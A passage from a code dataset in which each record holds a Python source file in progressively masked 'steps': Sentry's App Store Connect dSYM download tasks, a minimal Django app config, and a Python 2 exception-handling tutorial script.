except AppConnectBuild.DoesNotExist:
build_state = AppConnectBuild(
project=project,
app_id=build.app_id,
bundle_id=config.bundleId,
platform=build.platform,
bundle_short_version=build.version,
bundle_version=build.build_number,
uploaded_to_appstore=build.uploaded_date,
first_seen=timezone.now(),
fetched=False,
)
build_state.save()
return build_state
def process_builds(
project: Project,
config: appconnect.AppStoreConnectConfig,
to_process: List[appconnect.BuildInfo],
) -> List[Tuple[appconnect.BuildInfo, AppConnectBuild]]:
"""Returns a list of builds whose dSYMs need to be updated or fetched.
This will create a new "pending" :class:`AppConnectBuild` for any :class:`appconnect.BuildInfo`
that cannot be found in the DB. These pending :class:`AppConnectBuild`s are immediately saved
upon creation.
"""
pending_builds = []
with sentry_sdk.start_span(
op="appconnect-update-builds", description="Update AppStoreConnect builds in database"
):
for build in to_process:
build_state = get_or_create_persisted_build(project, config, build)
if not build_state.fetched:
pending_builds.append((build, build_state))
LatestAppConnectBuildsCheck.objects.create_or_update(
project=project, source_id=config.id, values={"last_checked": timezone.now()}
)
return pending_builds
# Untyped decorator would stop type-checking of entire function, split into an inner
# function instead which can be type checked.
@instrumented_task( # type: ignore
name="sentry.tasks.app_store_connect.refresh_all_builds",
queue="appstoreconnect",
ignore_result=True,
)
def refresh_all_builds() -> None:
inner_refresh_all_builds()
def inner_refresh_all_builds() -> None:
"""Refreshes all AppStoreConnect builds for all projects.
This iterates over all the projects configured in Sentry and for any which has an
AppStoreConnect symbol source configured will poll the AppStoreConnect API to check if
there are new builds.
"""
# We have no way to query for AppStore Connect symbol sources directly, but
# getting all of the project options that have custom symbol sources
# configured is a reasonable compromise, as the number of those should be
# low enough to traverse every hour.
# Another alternative would be to get a list of projects that have had a
# previous successful import, as indicated by existing `AppConnectBuild`
# objects. But that would miss projects that have a valid AppStore Connect
# setup, but have not yet published any kind of build to AppStore.
options = ProjectOption.objects.filter(key=appconnect.SYMBOL_SOURCES_PROP_NAME)
count = 0
for option in options:
with sdk.push_scope() as scope:
scope.set_tag("project", option.project_id)
try:
if not option.value:
# An empty string set as option value, the UI does this when deleting
# all sources. This is not valid JSON.
continue
# We are parsing JSON thus all types are Any, so give the type-checker some
# extra help. We are maybe slightly lying about the type, but the
# attributes we do access are all string values.
all_sources: List[Mapping[str, str]] = json.loads(option.value)
for source in all_sources:
try:
source_id = source["id"]
source_type = source["type"]
except KeyError:
logger.exception("Malformed symbol source")
continue
if source_type == appconnect.SYMBOL_SOURCE_TYPE_NAME:
dsym_download.apply_async(
kwargs={
"project_id": option.project_id,
"config_id": source_id,
}
)
count += 1
except Exception:
logger.exception("Failed to refresh AppStoreConnect builds")
metrics.gauge("tasks.app_store_connect.refreshed", count, sample_rate=1)
|
normal
|
{
"blob_id": "51bc2668a9f9f4425166f9e6da72b7a1c37baa01",
"index": 9628,
"step-1": "<mask token>\n\n\ndef inner_dsym_download(project_id: int, config_id: str) ->None:\n \"\"\"Downloads the dSYMs from App Store Connect and stores them in the Project's debug files.\"\"\"\n with sdk.configure_scope() as scope:\n scope.set_tag('project', project_id)\n scope.set_tag('config_id', config_id)\n project = Project.objects.get(pk=project_id)\n config = appconnect.AppStoreConnectConfig.from_project_config(project,\n config_id)\n client = appconnect.AppConnectClient.from_config(config)\n listed_builds = client.list_builds()\n builds = process_builds(project=project, config=config, to_process=\n listed_builds)\n if not builds:\n return\n for i, (build, build_state) in enumerate(builds):\n with sdk.configure_scope() as scope:\n scope.set_context('dsym_downloads', {'total': len(builds),\n 'completed': i})\n with tempfile.NamedTemporaryFile() as dsyms_zip:\n try:\n client.download_dsyms(build, pathlib.Path(dsyms_zip.name))\n except appconnect.NoDsymsError:\n logger.debug('No dSYMs for build %s', build)\n except appconnect.PendingDsymsError:\n logger.debug('dSYM url currently unavailable for build %s',\n build)\n continue\n except appstoreconnect_api.UnauthorizedError:\n sentry_sdk.capture_message(\n 'Not authorized to download dSYM using current App Store Connect credentials'\n , level='info')\n return\n except appstoreconnect_api.ForbiddenError:\n sentry_sdk.capture_message(\n 'Forbidden from downloading dSYM using current App Store Connect credentials'\n , level='info')\n return\n except ValueError as e:\n sdk.capture_exception(e)\n continue\n except appstoreconnect_api.RequestError as e:\n sdk.capture_exception(e)\n continue\n except requests.RequestException as e:\n sdk.capture_exception(e)\n continue\n else:\n create_difs_from_dsyms_zip(dsyms_zip.name, project)\n logger.debug('Uploaded dSYMs for build %s', build)\n metrics.incr('tasks.app_store_connect.builds_ingested',\n sample_rate=1)\n build_state.fetched = True\n build_state.save()\n\n\n<mask token>\n\n\ndef process_builds(project: Project, config: appconnect.\n AppStoreConnectConfig, to_process: List[appconnect.BuildInfo]) ->List[Tuple\n [appconnect.BuildInfo, AppConnectBuild]]:\n \"\"\"Returns a list of builds whose dSYMs need to be updated or fetched.\n\n This will create a new \"pending\" :class:`AppConnectBuild` for any :class:`appconnect.BuildInfo`\n that cannot be found in the DB. These pending :class:`AppConnectBuild`s are immediately saved\n upon creation.\n \"\"\"\n pending_builds = []\n with sentry_sdk.start_span(op='appconnect-update-builds', description=\n 'Update AppStoreConnect builds in database'):\n for build in to_process:\n build_state = get_or_create_persisted_build(project, config, build)\n if not build_state.fetched:\n pending_builds.append((build, build_state))\n LatestAppConnectBuildsCheck.objects.create_or_update(project=project,\n source_id=config.id, values={'last_checked': timezone.now()})\n return pending_builds\n\n\n@instrumented_task(name='sentry.tasks.app_store_connect.refresh_all_builds',\n queue='appstoreconnect', ignore_result=True)\ndef refresh_all_builds() ->None:\n inner_refresh_all_builds()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef inner_dsym_download(project_id: int, config_id: str) ->None:\n \"\"\"Downloads the dSYMs from App Store Connect and stores them in the Project's debug files.\"\"\"\n with sdk.configure_scope() as scope:\n scope.set_tag('project', project_id)\n scope.set_tag('config_id', config_id)\n project = Project.objects.get(pk=project_id)\n config = appconnect.AppStoreConnectConfig.from_project_config(project,\n config_id)\n client = appconnect.AppConnectClient.from_config(config)\n listed_builds = client.list_builds()\n builds = process_builds(project=project, config=config, to_process=\n listed_builds)\n if not builds:\n return\n for i, (build, build_state) in enumerate(builds):\n with sdk.configure_scope() as scope:\n scope.set_context('dsym_downloads', {'total': len(builds),\n 'completed': i})\n with tempfile.NamedTemporaryFile() as dsyms_zip:\n try:\n client.download_dsyms(build, pathlib.Path(dsyms_zip.name))\n except appconnect.NoDsymsError:\n logger.debug('No dSYMs for build %s', build)\n except appconnect.PendingDsymsError:\n logger.debug('dSYM url currently unavailable for build %s',\n build)\n continue\n except appstoreconnect_api.UnauthorizedError:\n sentry_sdk.capture_message(\n 'Not authorized to download dSYM using current App Store Connect credentials'\n , level='info')\n return\n except appstoreconnect_api.ForbiddenError:\n sentry_sdk.capture_message(\n 'Forbidden from downloading dSYM using current App Store Connect credentials'\n , level='info')\n return\n except ValueError as e:\n sdk.capture_exception(e)\n continue\n except appstoreconnect_api.RequestError as e:\n sdk.capture_exception(e)\n continue\n except requests.RequestException as e:\n sdk.capture_exception(e)\n continue\n else:\n create_difs_from_dsyms_zip(dsyms_zip.name, project)\n logger.debug('Uploaded dSYMs for build %s', build)\n metrics.incr('tasks.app_store_connect.builds_ingested',\n sample_rate=1)\n build_state.fetched = True\n build_state.save()\n\n\ndef create_difs_from_dsyms_zip(dsyms_zip: str, project: Project) ->None:\n with sentry_sdk.start_span(op='dsym-difs', description=\n 'Extract difs dSYM zip'):\n with open(dsyms_zip, 'rb') as fp:\n created = debugfile.create_files_from_dif_zip(fp, project,\n accept_unknown=True)\n for proj_debug_file in created:\n logger.debug('Created %r for project %s', proj_debug_file,\n project.id)\n\n\ndef get_or_create_persisted_build(project: Project, config: appconnect.\n AppStoreConnectConfig, build: appconnect.BuildInfo) ->AppConnectBuild:\n \"\"\"Fetches the sentry-internal :class:`AppConnectBuild`.\n\n The build corresponds to the :class:`appconnect.BuildInfo` as returned by the\n AppStore Connect API. If no build exists yet, a new \"pending\" build is created.\n \"\"\"\n try:\n build_state = AppConnectBuild.objects.get(project=project, app_id=\n build.app_id, platform=build.platform, bundle_short_version=\n build.version, bundle_version=build.build_number)\n except AppConnectBuild.DoesNotExist:\n build_state = AppConnectBuild(project=project, app_id=build.app_id,\n bundle_id=config.bundleId, platform=build.platform,\n bundle_short_version=build.version, bundle_version=build.\n build_number, uploaded_to_appstore=build.uploaded_date,\n first_seen=timezone.now(), fetched=False)\n build_state.save()\n return build_state\n\n\ndef process_builds(project: Project, config: appconnect.\n AppStoreConnectConfig, to_process: List[appconnect.BuildInfo]) ->List[Tuple\n [appconnect.BuildInfo, AppConnectBuild]]:\n \"\"\"Returns a list of builds whose dSYMs need to be updated or fetched.\n\n This will create a new \"pending\" :class:`AppConnectBuild` for any :class:`appconnect.BuildInfo`\n that cannot be found in the DB. These pending :class:`AppConnectBuild`s are immediately saved\n upon creation.\n \"\"\"\n pending_builds = []\n with sentry_sdk.start_span(op='appconnect-update-builds', description=\n 'Update AppStoreConnect builds in database'):\n for build in to_process:\n build_state = get_or_create_persisted_build(project, config, build)\n if not build_state.fetched:\n pending_builds.append((build, build_state))\n LatestAppConnectBuildsCheck.objects.create_or_update(project=project,\n source_id=config.id, values={'last_checked': timezone.now()})\n return pending_builds\n\n\n@instrumented_task(name='sentry.tasks.app_store_connect.refresh_all_builds',\n queue='appstoreconnect', ignore_result=True)\ndef refresh_all_builds() ->None:\n inner_refresh_all_builds()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@instrumented_task(name='sentry.tasks.app_store_connect.dsym_download',\n queue='appstoreconnect', ignore_result=True)\ndef dsym_download(project_id: int, config_id: str) ->None:\n inner_dsym_download(project_id=project_id, config_id=config_id)\n\n\ndef inner_dsym_download(project_id: int, config_id: str) ->None:\n \"\"\"Downloads the dSYMs from App Store Connect and stores them in the Project's debug files.\"\"\"\n with sdk.configure_scope() as scope:\n scope.set_tag('project', project_id)\n scope.set_tag('config_id', config_id)\n project = Project.objects.get(pk=project_id)\n config = appconnect.AppStoreConnectConfig.from_project_config(project,\n config_id)\n client = appconnect.AppConnectClient.from_config(config)\n listed_builds = client.list_builds()\n builds = process_builds(project=project, config=config, to_process=\n listed_builds)\n if not builds:\n return\n for i, (build, build_state) in enumerate(builds):\n with sdk.configure_scope() as scope:\n scope.set_context('dsym_downloads', {'total': len(builds),\n 'completed': i})\n with tempfile.NamedTemporaryFile() as dsyms_zip:\n try:\n client.download_dsyms(build, pathlib.Path(dsyms_zip.name))\n except appconnect.NoDsymsError:\n logger.debug('No dSYMs for build %s', build)\n except appconnect.PendingDsymsError:\n logger.debug('dSYM url currently unavailable for build %s',\n build)\n continue\n except appstoreconnect_api.UnauthorizedError:\n sentry_sdk.capture_message(\n 'Not authorized to download dSYM using current App Store Connect credentials'\n , level='info')\n return\n except appstoreconnect_api.ForbiddenError:\n sentry_sdk.capture_message(\n 'Forbidden from downloading dSYM using current App Store Connect credentials'\n , level='info')\n return\n except ValueError as e:\n sdk.capture_exception(e)\n continue\n except appstoreconnect_api.RequestError as e:\n sdk.capture_exception(e)\n continue\n except requests.RequestException as e:\n sdk.capture_exception(e)\n continue\n else:\n create_difs_from_dsyms_zip(dsyms_zip.name, project)\n logger.debug('Uploaded dSYMs for build %s', build)\n metrics.incr('tasks.app_store_connect.builds_ingested',\n sample_rate=1)\n build_state.fetched = True\n build_state.save()\n\n\ndef create_difs_from_dsyms_zip(dsyms_zip: str, project: Project) ->None:\n with sentry_sdk.start_span(op='dsym-difs', description=\n 'Extract difs dSYM zip'):\n with open(dsyms_zip, 'rb') as fp:\n created = debugfile.create_files_from_dif_zip(fp, project,\n accept_unknown=True)\n for proj_debug_file in created:\n logger.debug('Created %r for project %s', proj_debug_file,\n project.id)\n\n\ndef get_or_create_persisted_build(project: Project, config: appconnect.\n AppStoreConnectConfig, build: appconnect.BuildInfo) ->AppConnectBuild:\n \"\"\"Fetches the sentry-internal :class:`AppConnectBuild`.\n\n The build corresponds to the :class:`appconnect.BuildInfo` as returned by the\n AppStore Connect API. If no build exists yet, a new \"pending\" build is created.\n \"\"\"\n try:\n build_state = AppConnectBuild.objects.get(project=project, app_id=\n build.app_id, platform=build.platform, bundle_short_version=\n build.version, bundle_version=build.build_number)\n except AppConnectBuild.DoesNotExist:\n build_state = AppConnectBuild(project=project, app_id=build.app_id,\n bundle_id=config.bundleId, platform=build.platform,\n bundle_short_version=build.version, bundle_version=build.\n build_number, uploaded_to_appstore=build.uploaded_date,\n first_seen=timezone.now(), fetched=False)\n build_state.save()\n return build_state\n\n\ndef process_builds(project: Project, config: appconnect.\n AppStoreConnectConfig, to_process: List[appconnect.BuildInfo]) ->List[Tuple\n [appconnect.BuildInfo, AppConnectBuild]]:\n \"\"\"Returns a list of builds whose dSYMs need to be updated or fetched.\n\n This will create a new \"pending\" :class:`AppConnectBuild` for any :class:`appconnect.BuildInfo`\n that cannot be found in the DB. These pending :class:`AppConnectBuild`s are immediately saved\n upon creation.\n \"\"\"\n pending_builds = []\n with sentry_sdk.start_span(op='appconnect-update-builds', description=\n 'Update AppStoreConnect builds in database'):\n for build in to_process:\n build_state = get_or_create_persisted_build(project, config, build)\n if not build_state.fetched:\n pending_builds.append((build, build_state))\n LatestAppConnectBuildsCheck.objects.create_or_update(project=project,\n source_id=config.id, values={'last_checked': timezone.now()})\n return pending_builds\n\n\n@instrumented_task(name='sentry.tasks.app_store_connect.refresh_all_builds',\n queue='appstoreconnect', ignore_result=True)\ndef refresh_all_builds() ->None:\n inner_refresh_all_builds()\n\n\ndef inner_refresh_all_builds() ->None:\n \"\"\"Refreshes all AppStoreConnect builds for all projects.\n\n This iterates over all the projects configured in Sentry and for any which has an\n AppStoreConnect symbol source configured will poll the AppStoreConnect API to check if\n there are new builds.\n \"\"\"\n options = ProjectOption.objects.filter(key=appconnect.\n SYMBOL_SOURCES_PROP_NAME)\n count = 0\n for option in options:\n with sdk.push_scope() as scope:\n scope.set_tag('project', option.project_id)\n try:\n if not option.value:\n continue\n all_sources: List[Mapping[str, str]] = json.loads(option.value)\n for source in all_sources:\n try:\n source_id = source['id']\n source_type = source['type']\n except KeyError:\n logger.exception('Malformed symbol source')\n continue\n if source_type == appconnect.SYMBOL_SOURCE_TYPE_NAME:\n dsym_download.apply_async(kwargs={'project_id':\n option.project_id, 'config_id': source_id})\n count += 1\n except Exception:\n logger.exception('Failed to refresh AppStoreConnect builds')\n metrics.gauge('tasks.app_store_connect.refreshed', count, sample_rate=1)\n",
"step-4": "<mask token>\nimport logging\nimport pathlib\nimport tempfile\nfrom typing import List, Mapping, Tuple\nimport requests\nimport sentry_sdk\nfrom django.utils import timezone\nfrom sentry.lang.native import appconnect\nfrom sentry.models import AppConnectBuild, LatestAppConnectBuildsCheck, Project, ProjectOption, debugfile\nfrom sentry.tasks.base import instrumented_task\nfrom sentry.utils import json, metrics, sdk\nfrom sentry.utils.appleconnect import appstore_connect as appstoreconnect_api\nlogger = logging.getLogger(__name__)\n\n\n@instrumented_task(name='sentry.tasks.app_store_connect.dsym_download',\n queue='appstoreconnect', ignore_result=True)\ndef dsym_download(project_id: int, config_id: str) ->None:\n inner_dsym_download(project_id=project_id, config_id=config_id)\n\n\ndef inner_dsym_download(project_id: int, config_id: str) ->None:\n \"\"\"Downloads the dSYMs from App Store Connect and stores them in the Project's debug files.\"\"\"\n with sdk.configure_scope() as scope:\n scope.set_tag('project', project_id)\n scope.set_tag('config_id', config_id)\n project = Project.objects.get(pk=project_id)\n config = appconnect.AppStoreConnectConfig.from_project_config(project,\n config_id)\n client = appconnect.AppConnectClient.from_config(config)\n listed_builds = client.list_builds()\n builds = process_builds(project=project, config=config, to_process=\n listed_builds)\n if not builds:\n return\n for i, (build, build_state) in enumerate(builds):\n with sdk.configure_scope() as scope:\n scope.set_context('dsym_downloads', {'total': len(builds),\n 'completed': i})\n with tempfile.NamedTemporaryFile() as dsyms_zip:\n try:\n client.download_dsyms(build, pathlib.Path(dsyms_zip.name))\n except appconnect.NoDsymsError:\n logger.debug('No dSYMs for build %s', build)\n except appconnect.PendingDsymsError:\n logger.debug('dSYM url currently unavailable for build %s',\n build)\n continue\n except appstoreconnect_api.UnauthorizedError:\n sentry_sdk.capture_message(\n 'Not authorized to download dSYM using current App Store Connect credentials'\n , level='info')\n return\n except appstoreconnect_api.ForbiddenError:\n sentry_sdk.capture_message(\n 'Forbidden from downloading dSYM using current App Store Connect credentials'\n , level='info')\n return\n except ValueError as e:\n sdk.capture_exception(e)\n continue\n except appstoreconnect_api.RequestError as e:\n sdk.capture_exception(e)\n continue\n except requests.RequestException as e:\n sdk.capture_exception(e)\n continue\n else:\n create_difs_from_dsyms_zip(dsyms_zip.name, project)\n logger.debug('Uploaded dSYMs for build %s', build)\n metrics.incr('tasks.app_store_connect.builds_ingested',\n sample_rate=1)\n build_state.fetched = True\n build_state.save()\n\n\ndef create_difs_from_dsyms_zip(dsyms_zip: str, project: Project) ->None:\n with sentry_sdk.start_span(op='dsym-difs', description=\n 'Extract difs dSYM zip'):\n with open(dsyms_zip, 'rb') as fp:\n created = debugfile.create_files_from_dif_zip(fp, project,\n accept_unknown=True)\n for proj_debug_file in created:\n logger.debug('Created %r for project %s', proj_debug_file,\n project.id)\n\n\ndef get_or_create_persisted_build(project: Project, config: appconnect.\n AppStoreConnectConfig, build: appconnect.BuildInfo) ->AppConnectBuild:\n \"\"\"Fetches the sentry-internal :class:`AppConnectBuild`.\n\n The build corresponds to the :class:`appconnect.BuildInfo` as returned by the\n AppStore Connect API. If no build exists yet, a new \"pending\" build is created.\n \"\"\"\n try:\n build_state = AppConnectBuild.objects.get(project=project, app_id=\n build.app_id, platform=build.platform, bundle_short_version=\n build.version, bundle_version=build.build_number)\n except AppConnectBuild.DoesNotExist:\n build_state = AppConnectBuild(project=project, app_id=build.app_id,\n bundle_id=config.bundleId, platform=build.platform,\n bundle_short_version=build.version, bundle_version=build.\n build_number, uploaded_to_appstore=build.uploaded_date,\n first_seen=timezone.now(), fetched=False)\n build_state.save()\n return build_state\n\n\ndef process_builds(project: Project, config: appconnect.\n AppStoreConnectConfig, to_process: List[appconnect.BuildInfo]) ->List[Tuple\n [appconnect.BuildInfo, AppConnectBuild]]:\n \"\"\"Returns a list of builds whose dSYMs need to be updated or fetched.\n\n This will create a new \"pending\" :class:`AppConnectBuild` for any :class:`appconnect.BuildInfo`\n that cannot be found in the DB. These pending :class:`AppConnectBuild`s are immediately saved\n upon creation.\n \"\"\"\n pending_builds = []\n with sentry_sdk.start_span(op='appconnect-update-builds', description=\n 'Update AppStoreConnect builds in database'):\n for build in to_process:\n build_state = get_or_create_persisted_build(project, config, build)\n if not build_state.fetched:\n pending_builds.append((build, build_state))\n LatestAppConnectBuildsCheck.objects.create_or_update(project=project,\n source_id=config.id, values={'last_checked': timezone.now()})\n return pending_builds\n\n\n@instrumented_task(name='sentry.tasks.app_store_connect.refresh_all_builds',\n queue='appstoreconnect', ignore_result=True)\ndef refresh_all_builds() ->None:\n inner_refresh_all_builds()\n\n\ndef inner_refresh_all_builds() ->None:\n \"\"\"Refreshes all AppStoreConnect builds for all projects.\n\n This iterates over all the projects configured in Sentry and for any which has an\n AppStoreConnect symbol source configured will poll the AppStoreConnect API to check if\n there are new builds.\n \"\"\"\n options = ProjectOption.objects.filter(key=appconnect.\n SYMBOL_SOURCES_PROP_NAME)\n count = 0\n for option in options:\n with sdk.push_scope() as scope:\n scope.set_tag('project', option.project_id)\n try:\n if not option.value:\n continue\n all_sources: List[Mapping[str, str]] = json.loads(option.value)\n for source in all_sources:\n try:\n source_id = source['id']\n source_type = source['type']\n except KeyError:\n logger.exception('Malformed symbol source')\n continue\n if source_type == appconnect.SYMBOL_SOURCE_TYPE_NAME:\n dsym_download.apply_async(kwargs={'project_id':\n option.project_id, 'config_id': source_id})\n count += 1\n except Exception:\n logger.exception('Failed to refresh AppStoreConnect builds')\n metrics.gauge('tasks.app_store_connect.refreshed', count, sample_rate=1)\n",
"step-5": "\"\"\"Tasks for managing Debug Information Files from Apple App Store Connect.\n\nUsers can instruct Sentry to download dSYM from App Store Connect and put them into Sentry's\ndebug files. These tasks enable this functionality.\n\"\"\"\n\nimport logging\nimport pathlib\nimport tempfile\nfrom typing import List, Mapping, Tuple\n\nimport requests\nimport sentry_sdk\nfrom django.utils import timezone\n\nfrom sentry.lang.native import appconnect\nfrom sentry.models import (\n AppConnectBuild,\n LatestAppConnectBuildsCheck,\n Project,\n ProjectOption,\n debugfile,\n)\nfrom sentry.tasks.base import instrumented_task\nfrom sentry.utils import json, metrics, sdk\nfrom sentry.utils.appleconnect import appstore_connect as appstoreconnect_api\n\nlogger = logging.getLogger(__name__)\n\n\n# Sadly this decorator makes this entire function untyped for now as it does not itself have\n# typing annotations. So we do all the work outside of the decorated task function to work\n# around this.\n# Since all these args must be pickled we keep them to built-in types as well.\n@instrumented_task(name=\"sentry.tasks.app_store_connect.dsym_download\", queue=\"appstoreconnect\", ignore_result=True) # type: ignore\ndef dsym_download(project_id: int, config_id: str) -> None:\n inner_dsym_download(project_id=project_id, config_id=config_id)\n\n\ndef inner_dsym_download(project_id: int, config_id: str) -> None:\n \"\"\"Downloads the dSYMs from App Store Connect and stores them in the Project's debug files.\"\"\"\n with sdk.configure_scope() as scope:\n scope.set_tag(\"project\", project_id)\n scope.set_tag(\"config_id\", config_id)\n\n project = Project.objects.get(pk=project_id)\n config = appconnect.AppStoreConnectConfig.from_project_config(project, config_id)\n client = appconnect.AppConnectClient.from_config(config)\n\n listed_builds = client.list_builds()\n builds = process_builds(project=project, config=config, to_process=listed_builds)\n\n if not builds:\n return\n\n for i, (build, build_state) in enumerate(builds):\n with sdk.configure_scope() as scope:\n scope.set_context(\"dsym_downloads\", {\"total\": len(builds), \"completed\": i})\n with tempfile.NamedTemporaryFile() as dsyms_zip:\n try:\n client.download_dsyms(build, pathlib.Path(dsyms_zip.name))\n # For no dSYMs, let the build be marked as fetched so they're not\n # repeatedly re-checked every time this task is run.\n except appconnect.NoDsymsError:\n logger.debug(\"No dSYMs for build %s\", build)\n # Moves on to the next build so we don't check off fetched. This url will\n # eventuallyTM be populated, so revisit it at a later time.\n except appconnect.PendingDsymsError:\n logger.debug(\"dSYM url currently unavailable for build %s\", build)\n continue\n # early-return in unauthorized and forbidden to avoid trying all the other builds\n # as well, since an expired token will error for all of them.\n # the error is also swallowed unreported because this is an expected and actionable\n # error.\n except appstoreconnect_api.UnauthorizedError:\n sentry_sdk.capture_message(\n \"Not authorized to download dSYM using current App Store Connect credentials\",\n level=\"info\",\n )\n return\n except appstoreconnect_api.ForbiddenError:\n sentry_sdk.capture_message(\n \"Forbidden from downloading dSYM using current App Store Connect credentials\",\n level=\"info\",\n )\n return\n # Don't let malformed URLs abort all pending downloads in case it's an isolated instance\n except ValueError as e:\n sdk.capture_exception(e)\n continue\n # Assume request errors are a server side issue and do not abort all the\n # pending downloads.\n except appstoreconnect_api.RequestError as e:\n sdk.capture_exception(e)\n continue\n except requests.RequestException as e:\n sdk.capture_exception(e)\n continue\n else:\n create_difs_from_dsyms_zip(dsyms_zip.name, project)\n logger.debug(\"Uploaded dSYMs for build %s\", build)\n metrics.incr(\"tasks.app_store_connect.builds_ingested\", sample_rate=1)\n\n build_state.fetched = True\n build_state.save()\n\n\ndef create_difs_from_dsyms_zip(dsyms_zip: str, project: Project) -> None:\n with sentry_sdk.start_span(op=\"dsym-difs\", description=\"Extract difs dSYM zip\"):\n with open(dsyms_zip, \"rb\") as fp:\n created = debugfile.create_files_from_dif_zip(fp, project, accept_unknown=True)\n for proj_debug_file in created:\n logger.debug(\"Created %r for project %s\", proj_debug_file, project.id)\n\n\ndef get_or_create_persisted_build(\n project: Project, config: appconnect.AppStoreConnectConfig, build: appconnect.BuildInfo\n) -> AppConnectBuild:\n \"\"\"Fetches the sentry-internal :class:`AppConnectBuild`.\n\n The build corresponds to the :class:`appconnect.BuildInfo` as returned by the\n AppStore Connect API. If no build exists yet, a new \"pending\" build is created.\n \"\"\"\n try:\n build_state = AppConnectBuild.objects.get(\n project=project,\n app_id=build.app_id,\n platform=build.platform,\n bundle_short_version=build.version,\n bundle_version=build.build_number,\n )\n except AppConnectBuild.DoesNotExist:\n build_state = AppConnectBuild(\n project=project,\n app_id=build.app_id,\n bundle_id=config.bundleId,\n platform=build.platform,\n bundle_short_version=build.version,\n bundle_version=build.build_number,\n uploaded_to_appstore=build.uploaded_date,\n first_seen=timezone.now(),\n fetched=False,\n )\n build_state.save()\n return build_state\n\n\ndef process_builds(\n project: Project,\n config: appconnect.AppStoreConnectConfig,\n to_process: List[appconnect.BuildInfo],\n) -> List[Tuple[appconnect.BuildInfo, AppConnectBuild]]:\n \"\"\"Returns a list of builds whose dSYMs need to be updated or fetched.\n\n This will create a new \"pending\" :class:`AppConnectBuild` for any :class:`appconnect.BuildInfo`\n that cannot be found in the DB. These pending :class:`AppConnectBuild`s are immediately saved\n upon creation.\n \"\"\"\n\n pending_builds = []\n\n with sentry_sdk.start_span(\n op=\"appconnect-update-builds\", description=\"Update AppStoreConnect builds in database\"\n ):\n for build in to_process:\n build_state = get_or_create_persisted_build(project, config, build)\n if not build_state.fetched:\n pending_builds.append((build, build_state))\n\n LatestAppConnectBuildsCheck.objects.create_or_update(\n project=project, source_id=config.id, values={\"last_checked\": timezone.now()}\n )\n\n return pending_builds\n\n\n# Untyped decorator would stop type-checking of entire function, split into an inner\n# function instead which can be type checked.\n@instrumented_task( # type: ignore\n name=\"sentry.tasks.app_store_connect.refresh_all_builds\",\n queue=\"appstoreconnect\",\n ignore_result=True,\n)\ndef refresh_all_builds() -> None:\n inner_refresh_all_builds()\n\n\ndef inner_refresh_all_builds() -> None:\n \"\"\"Refreshes all AppStoreConnect builds for all projects.\n\n This iterates over all the projects configured in Sentry and for any which has an\n AppStoreConnect symbol source configured will poll the AppStoreConnect API to check if\n there are new builds.\n \"\"\"\n # We have no way to query for AppStore Connect symbol sources directly, but\n # getting all of the project options that have custom symbol sources\n # configured is a reasonable compromise, as the number of those should be\n # low enough to traverse every hour.\n # Another alternative would be to get a list of projects that have had a\n # previous successful import, as indicated by existing `AppConnectBuild`\n # objects. But that would miss projects that have a valid AppStore Connect\n # setup, but have not yet published any kind of build to AppStore.\n options = ProjectOption.objects.filter(key=appconnect.SYMBOL_SOURCES_PROP_NAME)\n count = 0\n for option in options:\n with sdk.push_scope() as scope:\n scope.set_tag(\"project\", option.project_id)\n try:\n if not option.value:\n # An empty string set as option value, the UI does this when deleting\n # all sources. This is not valid JSON.\n continue\n # We are parsing JSON thus all types are Any, so give the type-checker some\n # extra help. We are maybe slightly lying about the type, but the\n # attributes we do access are all string values.\n all_sources: List[Mapping[str, str]] = json.loads(option.value)\n for source in all_sources:\n try:\n source_id = source[\"id\"]\n source_type = source[\"type\"]\n except KeyError:\n logger.exception(\"Malformed symbol source\")\n continue\n if source_type == appconnect.SYMBOL_SOURCE_TYPE_NAME:\n dsym_download.apply_async(\n kwargs={\n \"project_id\": option.project_id,\n \"config_id\": source_id,\n }\n )\n count += 1\n except Exception:\n logger.exception(\"Failed to refresh AppStoreConnect builds\")\n metrics.gauge(\"tasks.app_store_connect.refreshed\", count, sample_rate=1)\n",
"step-ids": [
3,
5,
7,
9,
10
]
}
|
[
3,
5,
7,
9,
10
] |
from django.apps import AppConfig
class ClassromConfig(AppConfig):
name = 'classrom'
|
normal
|
{
"blob_id": "a995305cb5589fa0cbb246ae3ca6337f4f2c3ca1",
"index": 8798,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ClassromConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass ClassromConfig(AppConfig):\n name = 'classrom'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass ClassromConfig(AppConfig):\n name = 'classrom'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#exceptions.py
#-*- coding:utf-8 -*-
#exceptions
try:
print u'try。。。'
r = 10/0
print 'result:',r
except ZeroDivisionError,e:
print 'except:',e
finally:
print 'finally...'
print 'END'
try:
print u'try。。。'
r = 10/int('1')
print 'result:',r
except ValueError,e:
print 'ValueError:',e
except ZeroDivisionError,e:
print 'ZeroDivisionError:',e
else:
print 'no error!'
finally:
print 'finally...'
print 'END'
def foo(s):
return 10/int(s)
def bar(s):
return foo(s)*2
def main():
try:
bar('0')
except StandardError,e:
print 'Error!'
finally:
print 'finally...'
main()
def foo(s):
return 10/int(s)
def bar(s):
return foo(s)*2
def main():
bar('0')
#main()
import logging
def foo(s):
return 10/int(s)
def bar(s):
return foo(s)*2
def main():
try:
bar('0')
except StandardError,e:
logging.exception(e)
finally:
print 'finally...'
main()
print 'END'
class FooError(StandardError):
"""docstring for FooError"""
pass
def foo(s):
n = int(s)
if n == 0:
raise FooError('invalid value: %s'%s)
return 10/n
#foo(0)
def foo(s):
n = int(s)
return 10/n
def bar(s):
try:
return foo(s)*2
except StandardError,e:
print 'Log error and raise'
raise
def main():
bar('0')
#main()
import logging
import pdb
logging.basicConfig(level=logging.INFO)
s = '0'
n = int(s)
#pdb.set_trace()
logging.info('n=%d'%n)
#print 10/n
#python -m pdb exceptions.py
#l,n,p,q
|
normal
|
{
"blob_id": "1568cf544a4fe7aec082ef1d7506b8484d19f198",
"index": 3776,
